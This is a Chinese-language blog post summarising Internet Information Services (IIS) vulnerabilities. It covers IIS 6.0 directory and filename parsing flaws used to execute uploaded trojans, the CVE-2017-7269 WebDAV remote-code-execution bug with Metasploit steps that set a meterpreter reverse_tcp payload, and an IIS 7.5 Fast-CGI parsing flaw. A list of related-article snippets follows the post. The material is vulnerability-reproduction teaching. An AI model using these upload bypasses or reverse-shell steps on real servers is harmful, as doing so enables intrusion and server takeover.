IIS 漏洞总结

最新推荐文章于 2025-03-25 00:17:11 发布
置顶 最新推荐文章于 2025-03-25 00:17:11 发布
阅读量4.1k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: iis漏洞总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smli_ng/article/details/115580568
版权

 

 

目录

IIS介绍

IIS6.0 版本

目录解析漏洞

文件名解析漏洞

远程代码执行漏洞  cve_2017_7269 

漏洞描述

POC 说明

漏洞利用

IIS7.5版本

IIS解析漏洞

漏洞原理

实验环境搭建

漏洞复现

IIS介绍

iis是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务

IIS6.0 版本

目录解析漏洞

对于名字为.asp后缀的文件夹,IIS会将该文件夹内部的文件都解析为.asp文件来执行。

即构造名字为a.asp的目录,目录中的1.txt会作为asp文件执行。

文件名解析漏洞

对于名字为'a.asp;.jpg'文件,IIS并非以最后一个后缀名来判断格式,故会将其解析为asp文件并执行。

即上传木马的后缀名为'.asp;.jpg'就可以被服务器执行。

远程代码执行漏洞  cve_2017_7269 

漏洞描述

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞的威胁,远程攻击者通过以“if:<http://"开头的长header PROPFIND请求,执行任意代码。

POC 说明

  • cve_2017_7269 .rb
  • 此文件在我的资源中可以找到,或者私信我,我发给你!
  • 此处给出的该漏洞的exploit,用户需要结合Kali 中的Metasploit使用!放到kali路径为:/usr/share/metasploit-framework/modules/exploits/windows/iis/

漏洞利用

1.打开windows 2003 开启WebDAV

2.打开kali,将我们的poc文件放到指定位置,利用msf完成本次任务!

  • use expolit/windows/iis/cve_2017_7269
  • set payload windows/meterpreter/reverse_tcp
  • set rhost  192.168.31.130
  • run

3.由于我的windows server 2003 攻击过多,无法演示,以后会补上!

 

 

 

IIS7.5版本

IIS解析漏洞

漏洞原理

IIS7/7.5在Fast-CGI运行模式下,在某文件路径下(/x.jpg)后面加上’/.php’,则会以php文件格式解析该图片

 

实验环境搭建

 

漏洞复现

1.首先在网站根目录下有一个1.jpg图片,其内容为’<?php phpinfo(); ?>’,我们正常访问它 http://localhost/1.jpg

2.然后我们访问 http://localhost/1.jpg/.php ,可以看到以php文件格式解析该图片,执行phpinfo。

 

 

 

 

Web中间件漏洞总结——IIS
2401_88858891的博客
11-20 1370
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,如PUT,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。可以像在操作本地文件夹一样操作服务器上的文件夹,该扩展也存在缺陷,利用PUT方法可直接向服务器上传恶意文件,控制服务器。为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件名。
常见框架漏洞 中(IIS6.x、IIS7.x、Apache、Nginx)
2301_76631050的博客
08-07 1330
目录中间件IISIIS6.x篇PUT漏洞漏洞描述环境漏洞复现漏洞复现工具连接IIS6.0解析漏洞IIS短文件漏洞漏洞描述原理复现短⽂件名特征:⼯具IIS RCE-CVE-2017-7269简介影响范围复现利⽤⼯具反弹shellApache未知扩展名解析漏洞AddHandler导致的解析漏洞目录遍历漏洞原理复现Apache HTTPD 换行解析漏洞(CVE-2017-15715)Nginx文件解析漏洞目录遍历漏洞描述原理漏洞复现CRLF注⼊漏洞复现文件名逻辑漏洞(CVE-2013-4547)描述环境漏洞复现中
IIS漏洞大全(附修复方法)
C233333235的博客
08-07 3841
IlS Server 在 Web 服务扩展中开启了 WebDAV,配置了可以写入的权限,造成任意文件上传。漏洞复现本地搭建2003 server1)开启 WebDAV 和写权限:做好准备工作后开启环境,然后我们去访问配置的IP,访问到如下页面然后开启抓包刷新页面,在抓到的数据包后将其发送到重放器,将请求方式改为OPTIONS后点击发送,在返回包中就可以看到可以使用的请求方式。
常见框架漏洞攻略-IIS
最新发布
m0_66808441的博客
03-25 419
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执⾏任意代码 PROPFIND请求。
IIS漏洞整理
weixin_30752377的博客
05-24 211
 去年下半年关于IIS漏洞层出不穷,鉴于目前IIS的广泛使用,觉得有必要把收集的资料加以总结一下。1.介绍  这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的。如果想方便一些,下载一些WWW、CGI扫描器来辅助检查。  而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:telnet <目标机> 80...
IIS服务器】IIS服务器常见漏洞
时乙的博客
11-05 4522
文件解析漏洞 1、目录解析漏洞 2、文件名解析漏洞 3、畸形解析漏洞 IIS 短文件漏洞 PUT 任意文件写入 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 文件解析漏洞 1、目录解析漏洞IIS5.x/6.0 中,默认会将**.asp(*.asa、*.cer、*.cdx )目录下的.
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 9832
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
Web中间件常见漏洞总结.pdf
06-14
下面,我们将围绕文档提及的IIS中间件,总结其常见漏洞类型及修复建议。 1. IIS解析漏洞 IIS解析漏洞主要存在于IIS6.x版本中。服务器配置不当会导致解析问题,例如,当文件名包含“*”符号时,IIS服务器会忽略“*”...
NET IIS暴绝对路径漏洞
10-31
.NET IIS暴绝对路径漏洞是一种特定条件下可能发生的漏洞,它允许攻击者通过访问特定格式的URL获取服务器上的绝对文件路径信息。为了防止此类安全风险,组织应该采取措施升级.NET Framework版本、启用错误过滤机制...
文件解析漏洞总结(IIS,APACHE,NGINX)
st3pby的博客
11-03 1521
文件解析漏洞总结(IIS,APACHE,NGINX)
IIS-文件解析漏洞
热门推荐
大方子
07-22 1万+
IIS6.0有2种解析漏洞 1. 目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2. 文件解析 *.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 *.asp文件执行。 目录解析复现 ii6.0的服务器开启Active Server Pages服务拓展 新建一个text.jpg的文件 ...
iis 漏洞扫描和利用工具
03-06
iis 漏洞扫描和利用工具,相当好用。多种漏洞利用方式可以选择,可以试试看哦!
IIS的十七个常见安全漏洞
03-03
IIS的十七个常见安全漏洞
IIS漏洞
yangbz123的博客
06-07 712
IIS6.0解析漏洞 1、当服务器解析.asa和.asp文件时,其中网站目录下的所有文件都会当做.asp文件来解析。 在网站目录中新建一个test.asp的目录,再从test.asp目录下新建一个test.txt文档,在里面输入“你好世界”。 本来test.txt文件是不会被IIS去解析的,但是放在以.asp的test.asp目录下确被当做asp解析。 2、当文件为*.asp;abc.jpg时,也会被当做asp来执行,例如文件为test.asp;abc.jpg,结果照常解析。 漏洞预防 1、对网站目录
IIS 漏洞工具解析
明哥哥知识分享
09-16 2509
1. 概述通过学习文档内容。 熟悉并掌握 IIS 写入漏洞利用工具的利用方法,了解具体的功能内 容,亲自实践操作,并根据课程需求完成相关任务。 2. 工具功能说明 IIS 写入漏洞利用工具是由桂林老兵写的一款漏洞利用工具,专门针对 IIS 写入漏洞。 接下来我们具体介绍一下相关的使用。 2.1.第一部分 数据包格式 该功能模块默认的数据包传输方法有 7 种,分别是: OPTIONS 返回服务器的各种信息 PUT 生成上传文件数据包的。 POST 用来提交表单 MOVE 是改名数据包。 COPY 是复制数
iis解析漏洞
注定风是不羁旅人
03-20 737
目录解析(5.0-6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原理:服务器默认会把.asp目录下的文件解析为asp 文件解析 形式:www.xx.com/xx.asp;.jpg 原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg就会被解析为asp文件 解析文件类型 iii6.0默认的可执行文件除了asp文件还包括以下三种 .asa .cer .cdx ...
IIS漏洞-解析漏洞
swordheart的博客
11-30 7442
漏洞介绍 解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本文件等当做可执行的脚本文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。 IIS 5.x/6.0解析漏洞 目录解析:在网站下建立文件夹的名称中带有.asp、.asa等可执行脚本文件后缀为后缀的文件夹,其目录内的任何扩展名的文件都被IIS当作可执行文件来解析并执行。http://www.xxx.com/xx.asp/xx.jpg IIS 6.0环境下正常访问图片 通过访问1.asp/one.j..
文件解析漏洞总结-IIS
1stPeak's Blog
03-24 1403
IIS6.0解析漏洞 环境搭建:Windows Server 2003 漏洞一: 当目标服务器禁止上传.asp后缀的文件时,可以使用.cer或.asa后缀绕过,这两个后缀名依旧当做asp文件解析执行 例:有peak.cer和peak.asa,其内容都是 <% response.write("Hello World!") %> 漏洞二: 在网站中建立*.asp或*.asa的文件夹时...
IIS中间件漏洞
m0_67170526的博客
03-06 1002
WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。
IIS中间件漏洞分析及修复策略
总体而言,这份文档为管理员提供了一份详尽的IIS漏洞指南,有助于他们识别和修复潜在的安全问题,保护Web服务器免受攻击。对于任何使用IIS的组织,理解和应用这些安全措施至关重要,以确保他们的Web环境安全可靠。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值